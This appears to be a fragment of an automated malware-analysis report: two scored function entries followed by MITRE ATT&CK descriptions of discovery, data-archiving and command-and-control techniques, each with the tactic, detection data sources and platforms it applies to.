Function 00404076 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 169
sleeplibrarythreadCOMMON

Function 10002CEF Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 100
stringsleepfileCOMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre